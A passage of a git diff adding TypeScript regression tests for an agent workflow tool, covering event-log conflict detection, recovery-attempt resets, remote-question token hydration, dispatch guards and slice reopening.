+    assert.ok(completeKey !== null, "complete_slice should produce an entity key");
+    assert.equal(planKey!.type, "slice_plan", "plan_slice entity type should be 'slice_plan'");
+    assert.equal(completeKey!.type, "slice", "complete_slice entity type should be 'slice'");
+    assert.notEqual(
+      planKey!.type,
+      completeKey!.type,
+      "plan_slice and complete_slice must map to different entity types",
+    );
+  });
+
+  // detectConflicts
+  test("detectConflicts finds no conflicts when entities do not overlap", () => {
+    const mainDiverged: WorkflowEvent[] = [
+      makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" }),
+    ];
+    const wtDiverged: WorkflowEvent[] = [
+      makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T02" }),
+    ];
+
+    const conflicts = detectConflicts(mainDiverged, wtDiverged);
+    assert.equal(conflicts.length, 0, "non-overlapping task edits should produce no conflicts");
+  });
+
+  test("detectConflicts flags conflict when both sides touch the same task", () => {
+    const mainDiverged: WorkflowEvent[] = [
+      makeEvent("start_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" }),
+    ];
+    const wtDiverged: WorkflowEvent[] = [
+      makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" }),
+    ];
+
+    const conflicts = detectConflicts(mainDiverged, wtDiverged);
+    assert.equal(conflicts.length, 1, "same task touched by both sides should produce exactly one conflict");
+
+    const conflict = conflicts[0]!;
+    assert.equal(conflict.entityType, "task", "conflict entityType should be 'task'");
+    assert.equal(conflict.entityId, "T01", "conflict entityId should be 'T01'");
+  });
+
+  test("detectConflicts ignores events with null entity keys", () => {
+    // Events with unknown commands produce null keys and must not cause false conflicts.
+    const mainDiverged: WorkflowEvent[] = [
+      makeEvent("unknown_future_cmd", { milestoneId: "M001" }),
+    ];
+    const wtDiverged: WorkflowEvent[] = [
+      makeEvent("another_unknown_cmd", { milestoneId: "M001" }),
+    ];
+
+    const conflicts = detectConflicts(mainDiverged, wtDiverged);
+    assert.equal(conflicts.length, 0, "unknown commands with null entity keys should not produce conflicts");
+  });
+
+  // appendEvent — filesystem creation
+  test("appendEvent creates event log if directory does not exist", () => {
+    const base = tempDir();
+    // Remove the .gsd directory if it somehow exists — appendEvent should create it.
+    const gsdDir = path.join(base, ".gsd");
+    if (fs.existsSync(gsdDir)) fs.rmSync(gsdDir, { recursive: true, force: true });
+
+    appendEvent(base, {
+      cmd: "complete_task",
+      params: { milestoneId: "M001", sliceId: "S01", taskId: "T01" },
+      ts: new Date().toISOString(),
+      actor: "agent",
+    });
+
+    const logPath = path.join(base, ".gsd", "event-log.jsonl");
+    assert.ok(fs.existsSync(logPath), "event-log.jsonl should be created by appendEvent");
+
+    const events = readEvents(logPath);
+    assert.equal(events.length, 1, "event log should contain exactly one event");
+    assert.equal(events[0]!.cmd, "complete_task", "persisted event should have the correct cmd");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/recovery-attempts-reset.test.ts b/src/resources/extensions/gsd/tests/recovery-attempts-reset.test.ts
new file mode 100644
index 000000000..0b540d3d3
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/recovery-attempts-reset.test.ts
@@ -0,0 +1,176 @@
+/**
+ * Regression test for #2322: recoveryAttempts persists across re-dispatches,
+ * causing instant task skip.
+ *
+ * When a unit hits recovery limits and is later re-dispatched, the
+ * recoveryAttempts counter from the prior execution carries over because
+ * the dispatch-time writeUnitRuntimeRecord call does not reset it.
+ * This causes the next execution to be instantly skipped with no steering
+ * message or second chance.
+ *
+ * The fix: include `recoveryAttempts: 0` in the dispatch-time runtime
+ * record write in runUnitPhase.
+ */
+
+import { mkdtempSync, mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import {
+  writeUnitRuntimeRecord,
+  readUnitRuntimeRecord,
+} from "../unit-runtime.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+// ═══ Setup ════════════════════════════════════════════════════════════════════
+
+const base = mkdtempSync(join(tmpdir(), "gsd-recovery-reset-test-"));
+mkdirSync(join(base, ".gsd", "runtime", "units"), { recursive: true });
+
+try {
+  // ═══ #2322: recoveryAttempts should reset on re-dispatch ═══════════════════
+
+  {
+    console.log("\n=== #2322: recoveryAttempts should reset on re-dispatch ===");
+
+    const unitType = "execute-task";
+    const unitId = "M001/S01/T01";
+    const startedAt1 = Date.now() - 10000;
+
+    // Simulate first dispatch — clean state
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt1, {
+      phase: "dispatched",
+      wrapupWarningSent: false,
+      timeoutAt: null,
+      lastProgressAt: startedAt1,
+      progressCount: 0,
+      lastProgressKind: "dispatch",
+    });
+
+    // Simulate timeout recovery incrementing recoveryAttempts
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt1, {
+      phase: "recovered",
+      recoveryAttempts: 1,
+      lastRecoveryReason: "hard",
+    });
+
+    const afterRecovery = readUnitRuntimeRecord(base, unitType, unitId);
+    assertEq(afterRecovery?.recoveryAttempts, 1, "recoveryAttempts should be 1 after recovery");
+    assertEq(afterRecovery?.lastRecoveryReason, "hard", "lastRecoveryReason should be 'hard'");
+
+    // Simulate re-dispatch (second execution of same unit).
+    // This is what runUnitPhase should do at dispatch time — explicitly reset
+    // recoveryAttempts so the new execution gets its full recovery budget.
+    const startedAt2 = Date.now();
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt2, {
+      phase: "dispatched",
+      wrapupWarningSent: false,
+      timeoutAt: null,
+      lastProgressAt: startedAt2,
+      progressCount: 0,
+      lastProgressKind: "dispatch",
+      recoveryAttempts: 0, // FIX: must be explicitly reset
+    });
+
+    const afterRedispatch = readUnitRuntimeRecord(base, unitType, unitId);
+    assertEq(
+      afterRedispatch?.recoveryAttempts,
+      0,
+      "recoveryAttempts should be 0 after re-dispatch (was carried over from prior execution)",
+    );
+  }
+
+  // ═══ Verify the BUG scenario: omitting recoveryAttempts carries it over ═══
+
+  {
+    console.log("\n=== #2322: demonstrates bug — omitting recoveryAttempts carries it over ===");
+
+    const unitType = "execute-task";
+    const unitId = "M001/S01/T02";
+    const startedAt1 = Date.now() - 10000;
+
+    // First dispatch
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt1, {
+      phase: "dispatched",
+    });
+
+    // Timeout bumps recoveryAttempts to 1
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt1, {
+      recoveryAttempts: 1,
+      lastRecoveryReason: "hard",
+    });
+
+    // Re-dispatch WITHOUT resetting recoveryAttempts (the bug)
+    const startedAt2 = Date.now();
+    writeUnitRuntimeRecord(base, unitType, unitId, startedAt2, {
+      phase: "dispatched",
+      wrapupWarningSent: false,
+      timeoutAt: null,
+      lastProgressAt: startedAt2,
+      progressCount: 0,
+      lastProgressKind: "dispatch",
+      // recoveryAttempts: NOT included — this is the bug
+    });
+
+    const afterBuggyRedispatch = readUnitRuntimeRecord(base, unitType, unitId);
+    // This DEMONSTRATES the bug: recoveryAttempts is still 1
+    assertEq(
+      afterBuggyRedispatch?.recoveryAttempts,
+      1,
+      "BUG DEMO: recoveryAttempts carries over when not explicitly reset",
+    );
+  }
+
+  // ═══ Hard timeout maxRecoveryAttempts=1 — second dispatch must get full budget ═══
+
+  {
+    console.log("\n=== #2322: second dispatch gets full hard-timeout budget after reset ===");
+
+    const unitType = "execute-task";
+    const unitId = "M001/S01/T03";
+
+    // First dispatch
+    const start1 = Date.now() - 20000;
+    writeUnitRuntimeRecord(base, unitType, unitId, start1, {
+      phase: "dispatched",
+      recoveryAttempts: 0,
+    });
+
+    // Hard timeout recovery — exhausts the budget (maxRecoveryAttempts=1 for hard)
+    writeUnitRuntimeRecord(base, unitType, unitId, start1, {
+      phase: "recovered",
+      recoveryAttempts: 1,
+      lastRecoveryReason: "hard",
+    });
+
+    const afterExhausted = readUnitRuntimeRecord(base, unitType, unitId);
+    assertEq(afterExhausted?.recoveryAttempts, 1, "budget exhausted after hard recovery");
+
+    // Second dispatch with fix: reset recoveryAttempts
+    const start2 = Date.now();
+    writeUnitRuntimeRecord(base, unitType, unitId, start2, {
+      phase: "dispatched",
+      wrapupWarningSent: false,
+      timeoutAt: null,
+      lastProgressAt: start2,
+      progressCount: 0,
+      lastProgressKind: "dispatch",
+      recoveryAttempts: 0,
+    });
+
+    const afterReset = readUnitRuntimeRecord(base, unitType, unitId);
+    assertEq(afterReset?.recoveryAttempts, 0, "second dispatch has full recovery budget");
+
+    // Now a hard timeout should be recoverable (0 < 1)
+    assertTrue(
+      (afterReset?.recoveryAttempts ?? 0) < 1,
+      "hard recovery should be allowed (recoveryAttempts < maxRecoveryAttempts)",
+    );
+  }
+
+} finally {
+  rmSync(base, { recursive: true, force: true });
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/register-extension-guard.test.ts b/src/resources/extensions/gsd/tests/register-extension-guard.test.ts
new file mode 100644
index 000000000..9d926b852
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/register-extension-guard.test.ts
@@ -0,0 +1,59 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import { handleRecoverableExtensionProcessError } from "../bootstrap/register-extension.ts";
+
+test("handleRecoverableExtensionProcessError swallows spawn ENOENT", () => {
+  let stderr = "";
+  const originalWrite = process.stderr.write.bind(process.stderr);
+  process.stderr.write = ((chunk: string | Uint8Array) => {
+    stderr += String(chunk);
+    return true;
+  }) as typeof process.stderr.write;
+
+  try {
+    const handled = handleRecoverableExtensionProcessError(
+      Object.assign(new Error("missing binary"), {
+        code: "ENOENT",
+        syscall: "spawn npm",
+        path: "npm",
+      }),
+    );
+    assert.equal(handled, true);
+    assert.match(stderr, /spawn ENOENT: npm/);
+  } finally {
+    process.stderr.write = originalWrite;
+  }
+});
+
+test("handleRecoverableExtensionProcessError swallows uv_cwd ENOENT", () => {
+  let stderr = "";
+  const originalWrite = process.stderr.write.bind(process.stderr);
+  process.stderr.write = ((chunk: string | Uint8Array) => {
+    stderr += String(chunk);
+    return true;
+  }) as typeof process.stderr.write;
+
+  try {
+    const handled = handleRecoverableExtensionProcessError(
+      Object.assign(new Error("process.cwd failed"), {
+        code: "ENOENT",
+        syscall: "uv_cwd",
+      }),
+    );
+    assert.equal(handled, true);
+    assert.match(stderr, /ENOENT \(uv_cwd\): process\.cwd failed/);
+  } finally {
+    process.stderr.write = originalWrite;
+  }
+});
+
+test("handleRecoverableExtensionProcessError leaves unrelated errors unhandled", () => {
+  const handled = handleRecoverableExtensionProcessError(
+    Object.assign(new Error("permission denied"), {
+      code: "EPERM",
+      syscall: "open",
+    }),
+  );
+  assert.equal(handled, false);
+});
diff --git a/src/resources/extensions/gsd/tests/register-shortcuts.test.ts b/src/resources/extensions/gsd/tests/register-shortcuts.test.ts
new file mode 100644
index 000000000..e67902af2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/register-shortcuts.test.ts
@@ -0,0 +1,73 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { registerShortcuts } from "../bootstrap/register-shortcuts.ts";
+
+function makeTempDir(prefix: string): string {
+  const dir = join(
+    tmpdir(),
+    `gsd-register-shortcuts-test-${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+  );
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function cleanup(dir: string): void {
+  try {
+    rmSync(dir, { recursive: true, force: true });
+  } catch {
+    // best-effort
+  }
+}
+
+test("dashboard shortcut resolves the project root instead of the current worktree path", async (t) => {
+  const projectRoot = makeTempDir("project");
+  const worktreeRoot = join(projectRoot, ".gsd", "worktrees", "M001");
+  mkdirSync(join(projectRoot, ".gsd"), { recursive: true });
+  mkdirSync(worktreeRoot, { recursive: true });
+
+  const originalCwd = process.cwd();
+  process.chdir(worktreeRoot);
+  t.after(() => {
+    process.chdir(originalCwd);
+    cleanup(projectRoot);
+  });
+
+  let capturedHandler: ((ctx: any) => Promise<void>) | null = null;
+  const shortcuts: Array<{ description: string; handler: (ctx: any) => Promise<void> }> = [];
+  const pi = {
+    registerShortcut: (_key: unknown, shortcut: { description: string; handler: (ctx: any) => Promise<void> }) => {
+      shortcuts.push(shortcut);
+      if (!capturedHandler) {
+        capturedHandler = shortcut.handler;
+      }
+    },
+  } as any;
+
+  registerShortcuts(pi);
+  assert.ok(capturedHandler, "dashboard shortcut is registered");
+  const dashboardShortcut = shortcuts[0];
+  assert.ok(dashboardShortcut, "dashboard shortcut is captured");
+
+  let customCalls = 0;
+  const notices: Array<{ message: string; type?: string }> = [];
+  await dashboardShortcut.handler({
+    hasUI: true,
+    ui: {
+      custom: async () => {
+        customCalls++;
+        return true;
+      },
+      notify: (message: string, type?: string) => {
+        notices.push({ message, type });
+      },
+    },
+  });
+
+  assert.ok(customCalls > 0, "shortcut opens the dashboard overlay when project root is resolved");
+  assert.equal(notices.length, 0, "shortcut does not fall back to the missing-.gsd warning");
+  assert.equal(shortcuts.length, 3, "all GSD shortcuts are still registered");
+});
diff --git a/src/resources/extensions/gsd/tests/remediation-completion-guard.test.ts b/src/resources/extensions/gsd/tests/remediation-completion-guard.test.ts
new file mode 100644
index 000000000..93a9b55bd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/remediation-completion-guard.test.ts
@@ -0,0 +1,110 @@
+/**
+ * Regression test for #2675: completing-milestone dispatch rule must
+ * block completion when VALIDATION verdict is "needs-remediation".
+ *
+ * Without this guard, needs-remediation + allSlicesDone causes a loop:
+ * complete-milestone dispatched → agent refuses (correct) → no SUMMARY
+ * → re-dispatch → repeat until stuck detection fires.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { DISPATCH_RULES } from "../auto-dispatch.ts";
+
+/** Find the completing-milestone dispatch rule */
+const completingRule = DISPATCH_RULES.find(r => r.name === "completing-milestone → complete-milestone");
+
+test("completing-milestone dispatch rule exists", () => {
+  assert.ok(completingRule, "rule should exist in DISPATCH_RULES");
+});
+
+test("completing-milestone blocks when VALIDATION verdict is needs-remediation (#2675)", async () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-remediation-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+
+  try {
+    // Write a VALIDATION file with needs-remediation verdict
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md"),
+      [
+        "---",
+        "verdict: needs-remediation",
+        "remediation_round: 0",
+        "---",
+        "",
+        "# Validation Report",
+        "",
+        "3 success criteria failed. Remediation required.",
+      ].join("\n"),
+    );
+
+    const ctx = {
+      mid: "M001",
+      midTitle: "Test Milestone",
+      basePath: base,
+      state: { phase: "completing-milestone" } as any,
+      prefs: {} as any,
+      session: undefined,
+    };
+
+    const result = await completingRule!.match(ctx);
+
+    assert.ok(result !== null, "rule should match");
+    assert.equal(result!.action, "stop", "should return stop action");
+    if (result!.action === "stop") {
+      assert.equal(result!.level, "warning", "should be warning level (pausable)");
+      assert.ok(
+        result!.reason.includes("needs-remediation"),
+        "reason should mention needs-remediation",
+      );
+    }
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("completing-milestone proceeds normally when VALIDATION verdict is pass (#2675 guard)", async () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-remediation-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+
+  try {
+    // Write a VALIDATION file with pass verdict
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md"),
+      [
+        "---",
+        "verdict: pass",
+        "---",
+        "",
+        "# Validation Report",
+        "",
+        "All criteria met.",
+      ].join("\n"),
+    );
+
+    const ctx = {
+      mid: "M001",
+      midTitle: "Test Milestone",
+      basePath: base,
+      state: { phase: "completing-milestone" } as any,
+      prefs: {} as any,
+      session: undefined,
+    };
+
+    const result = await completingRule!.match(ctx);
+
+    // Should NOT return a stop — should either dispatch or return stop for
+    // a different reason (e.g. missing SUMMARY files, no implementation)
+    if (result && result.action === "stop") {
+      assert.ok(
+        !result.reason.includes("needs-remediation"),
+        "pass verdict should NOT trigger the remediation guard",
+      );
+    }
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/remote-questions.test.ts b/src/resources/extensions/gsd/tests/remote-questions.test.ts
index f5cb815cb..c780e6ecc 100644
--- a/src/resources/extensions/gsd/tests/remote-questions.test.ts
+++ b/src/resources/extensions/gsd/tests/remote-questions.test.ts
@@ -640,3 +640,235 @@ test("DiscordAdapter source-level: sendPrompt sets threadUrl in ref", () => {
     "sendPrompt should set threadUrl to the constructed message URL",
   );
 });
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Auth.json Token Hydration Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("config source-level: hydrateRemoteTokensFromAuth is called before env check in resolveRemoteConfig", () => {
+  const configSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "config.ts"),
+    "utf-8",
+  );
+  // Find the body of resolveRemoteConfig by slicing from its declaration to the next export function.
+  const resolveStart = configSrc.indexOf("export function resolveRemoteConfig()");
+  const resolveEnd = configSrc.indexOf("\nexport function", resolveStart + 1);
+  const resolveFnBody = configSrc.slice(resolveStart, resolveEnd);
+
+  const hydrationIdx = resolveFnBody.indexOf("hydrateRemoteTokensFromAuth()");
+  const envCheckIdx = resolveFnBody.indexOf("process.env[ENV_KEYS[");
+  assert.ok(hydrationIdx !== -1, "hydrateRemoteTokensFromAuth() should be called inside resolveRemoteConfig");
+  assert.ok(envCheckIdx !== -1, "process.env[ENV_KEYS[ lookup should exist inside resolveRemoteConfig");
+  assert.ok(hydrationIdx < envCheckIdx, "hydration call should appear before the process.env env-key lookup");
+});
+
+test("config source-level: hydrateRemoteTokensFromAuth is called in getRemoteConfigStatus", () => {
+  const configSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "config.ts"),
+    "utf-8",
+  );
+  const statusFnIdx = configSrc.indexOf("export function getRemoteConfigStatus()");
+  const hydrationInStatus = configSrc.indexOf("hydrateRemoteTokensFromAuth()", statusFnIdx);
+  assert.ok(hydrationInStatus > statusFnIdx, "hydrateRemoteTokensFromAuth should be called inside getRemoteConfigStatus");
+});
+
+test("config source-level: AUTH_PROVIDER_ENV_MAP covers all three remote channels", () => {
+  const configSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "config.ts"),
+    "utf-8",
+  );
+  assert.ok(configSrc.includes("discord_bot"), "AUTH_PROVIDER_ENV_MAP should include discord_bot");
+  assert.ok(configSrc.includes("slack_bot"),   "AUTH_PROVIDER_ENV_MAP should include slack_bot");
+  assert.ok(configSrc.includes("telegram_bot"), "AUTH_PROVIDER_ENV_MAP should include telegram_bot");
+  assert.ok(configSrc.includes("DISCORD_BOT_TOKEN"), "should map discord_bot to DISCORD_BOT_TOKEN");
+  assert.ok(configSrc.includes("SLACK_BOT_TOKEN"),   "should map slack_bot to SLACK_BOT_TOKEN");
+  assert.ok(configSrc.includes("TELEGRAM_BOT_TOKEN"), "should map telegram_bot to TELEGRAM_BOT_TOKEN");
+});
+
+test("config source-level: hydration skips env vars already set", () => {
+  const configSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "config.ts"),
+    "utf-8",
+  );
+  // The guard that skips already-set vars must be present.
+  assert.ok(
+    configSrc.includes("!process.env[envVar]"),
+    "hydrateRemoteTokensFromAuth should skip env vars that are already populated",
+  );
+});
+
+test("resolveRemoteConfig returns null when preferences are absent (no env side-effects)", () => {
+  // Guard: ensure that with no prefs configured, resolveRemoteConfig returns null cleanly.
+  // This exercises the hydration path without auth.json present (it should no-op silently).
+  const savedHome = process.env.HOME;
+  const savedUserProfile = process.env.USERPROFILE;
+  const savedDiscord = process.env.DISCORD_BOT_TOKEN;
+  const savedSlack = process.env.SLACK_BOT_TOKEN;
+  const savedTelegram = process.env.TELEGRAM_BOT_TOKEN;
+  try {
+    // Point HOME to a nonexistent dir so auth.json lookup finds nothing.
+    process.env.HOME = "/tmp/gsd-no-such-home-for-test";
+    process.env.USERPROFILE = "/tmp/gsd-no-such-home-for-test";
+    delete process.env.DISCORD_BOT_TOKEN;
+    delete process.env.SLACK_BOT_TOKEN;
+    delete process.env.TELEGRAM_BOT_TOKEN;
+
+    const result = resolveRemoteConfig();
+    // With no prefs file, result is null — not an exception.
+    assert.equal(result, null, "resolveRemoteConfig should return null when no preferences are configured");
+  } finally {
+    process.env.HOME = savedHome;
+    process.env.USERPROFILE = savedUserProfile;
+    if (savedDiscord !== undefined) process.env.DISCORD_BOT_TOKEN = savedDiscord;
+    if (savedSlack !== undefined) process.env.SLACK_BOT_TOKEN = savedSlack;
+    if (savedTelegram !== undefined) process.env.TELEGRAM_BOT_TOKEN = savedTelegram;
+  }
+});
+
+test("config source-level: hydration skips api_key entries with empty keys", () => {
+  const configSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "config.ts"),
+    "utf-8",
+  );
+  // The find() call in hydrateRemoteTokensFromAuth must filter for non-empty keys,
+  // not just match on type === "api_key". This prevents stale empty-key entries
+  // (left by removeProviderToken) from shadowing valid tokens.
+  assert.ok(
+    configSrc.includes('c.type === "api_key" && !!c.key'),
+    "hydrateRemoteTokensFromAuth find() should require a non-empty key",
+  );
+});
+
+test("ask-user-questions source-level: tryRemoteQuestions is called before the hasUI guard", () => {
+  // Regression test for #3480 — remote questions were silently skipped in interactive
+  // mode because tryRemoteQuestions was gated behind `if (!ctx.hasUI)`.
+  // The fix moved the remote call before that guard so configured channels
+  // (Telegram/Slack/Discord) fire regardless of UI availability.
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+
+  const remoteCallIdx = src.indexOf("tryRemoteQuestions(params.questions");
+  const hasUIGuardIdx = src.indexOf("if (!ctx.hasUI)");
+
+  assert.ok(remoteCallIdx !== -1, "tryRemoteQuestions call should exist in ask-user-questions.ts");
+  assert.ok(hasUIGuardIdx !== -1, "!ctx.hasUI guard should exist in ask-user-questions.ts");
+  assert.ok(
+    remoteCallIdx < hasUIGuardIdx,
+    "tryRemoteQuestions must be called before the !ctx.hasUI guard — otherwise remote questions are skipped in interactive mode",
+  );
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Race model tests (#3810) — local TUI races against remote channel
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("ask-user-questions source-level: raceRemoteAndLocal function exists", () => {
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("async function raceRemoteAndLocal("),
+    "raceRemoteAndLocal helper should exist for racing local TUI against remote channel",
+  );
+});
+
+test("ask-user-questions source-level: race path uses isRemoteConfigured for routing", () => {
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("isRemoteConfigured()"),
+    "execute() should call isRemoteConfigured() for lightweight routing decision",
+  );
+});
+
+test("ask-user-questions source-level: race path checks both hasRemote and ctx.hasUI", () => {
+  // Regression: #3810 — the race should only activate when BOTH remote and local UI
+  // are available. Headless mode should still use remote-only, and no-remote should
+  // use local-only.
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("hasRemote && ctx.hasUI"),
+    "Race path should require both remote configured and local UI available",
+  );
+  assert.ok(
+    src.includes("hasRemote && !ctx.hasUI"),
+    "Headless path should handle remote-only when no local UI",
+  );
+});
+
+test("ask-user-questions source-level: race treats remote timeout as non-win", () => {
+  // Regression: the whole point of the race is that a remote timeout should NOT
+  // block the local TUI. The race helper must filter out timed_out results.
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+  const raceFnStart = src.indexOf("async function raceRemoteAndLocal(");
+  const raceFnEnd = src.indexOf("\n}", raceFnStart);
+  const raceFnBody = src.slice(raceFnStart, raceFnEnd);
+  assert.ok(
+    raceFnBody.includes("timed_out"),
+    "raceRemoteAndLocal should check for timed_out in remote results",
+  );
+  assert.ok(
+    raceFnBody.includes("details?.error"),
+    "raceRemoteAndLocal should check for error in remote results",
+  );
+});
+
+test("ask-user-questions source-level: race uses AbortController to cancel loser", () => {
+  const src = readFileSync(
+    join(__dirname, "..", "..", "ask-user-questions.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("new AbortController()"),
+    "Race path should create an AbortController for cancellation",
+  );
+  assert.ok(
+    src.includes("controller.abort()"),
+    "raceRemoteAndLocal should abort the controller to cancel the losing side",
+  );
+});
+
+test("manager source-level: isRemoteConfigured export exists", () => {
+  const src = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "manager.ts"),
+    "utf-8",
+  );
+  assert.ok(
+    src.includes("export function isRemoteConfigured()"),
+    "manager.ts should export isRemoteConfigured for lightweight config checking",
+  );
+  // Must delegate to resolveRemoteConfig — no separate config parsing
+  const fnStart = src.indexOf("export function isRemoteConfigured()");
+  const fnEnd = src.indexOf("\n}", fnStart);
+  const fnBody = src.slice(fnStart, fnEnd);
+  assert.ok(
+    fnBody.includes("resolveRemoteConfig()"),
+    "isRemoteConfigured should delegate to resolveRemoteConfig",
+  );
+});
+
+test("config source-level: removeProviderToken uses auth.remove not auth.set with empty key", () => {
+  const commandSrc = readFileSync(
+    join(__dirname, "..", "..", "remote-questions", "remote-command.ts"),
+    "utf-8",
+  );
+  // removeProviderToken should call auth.remove(provider), not auth.set(provider, { key: "" }).
+  // Setting an empty key pollutes the credentials array and shadows valid tokens.
+  const fnStart = commandSrc.indexOf("function removeProviderToken");
+  assert.ok(fnStart !== -1, "removeProviderToken should exist");
+  const fnEnd = commandSrc.indexOf("\n}", fnStart);
+  const fnBody = commandSrc.slice(fnStart, fnEnd);
+  assert.ok(fnBody.includes("auth.remove("), "removeProviderToken should call auth.remove()");
+  assert.ok(!fnBody.includes('key: ""'), "removeProviderToken should not set an empty key");
+});
diff --git a/src/resources/extensions/gsd/tests/reopen-slice.test.ts b/src/resources/extensions/gsd/tests/reopen-slice.test.ts
new file mode 100644
index 000000000..eec8d5207
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/reopen-slice.test.ts
@@ -0,0 +1,155 @@
+// GSD — reopen-slice handler tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getSlice,
+  getSliceTasks,
+} from '../gsd-db.ts';
+import { handleReopenSlice } from '../tools/reopen-slice.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-reopen-slice-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedCompleteSlice(): void {
+  insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'complete' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Task One', status: 'complete' });
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Task Two', status: 'complete' });
+}
+
+// ─── Success path ────────────────────────────────────────────────────────
+
+test('handleReopenSlice: resets a complete slice to in_progress and all tasks to pending', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    seedCompleteSlice();
+
+    const result = await handleReopenSlice({
+      milestoneId: 'M001',
+      sliceId: 'S01',
+      reason: 'need to redo after requirements change',
+    }, base);
+
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+    assert.equal(result.sliceId, 'S01');
+    assert.equal(result.tasksReset, 2, 'should report 2 tasks reset');
+
+    const slice = getSlice('M001', 'S01');
+    assert.ok(slice, 'slice should still exist');
+    assert.equal(slice!.status, 'in_progress', 'slice status should be in_progress');
+
+    const tasks = getSliceTasks('M001', 'S01');
+    assert.equal(tasks.length, 2, 'both tasks should still exist');
+    assert.ok(tasks.every(t => t.status === 'pending'), 'all tasks should be pending');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReopenSlice: works with a single task', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', status: 'complete' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete' });
+
+    const result = await handleReopenSlice({ milestoneId: 'M001', sliceId: 'S01' }, base);
+
+    assert.ok(!('error' in result));
+    assert.equal(result.tasksReset, 1);
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── Failure paths ───────────────────────────────────────────────────────
+
+test('handleReopenSlice: rejects empty sliceId', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+  try {
+    const result = await handleReopenSlice({ milestoneId: 'M001', sliceId: '' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /sliceId/);
+  } finally {
+    cleanup(base);
+  }
+});
+
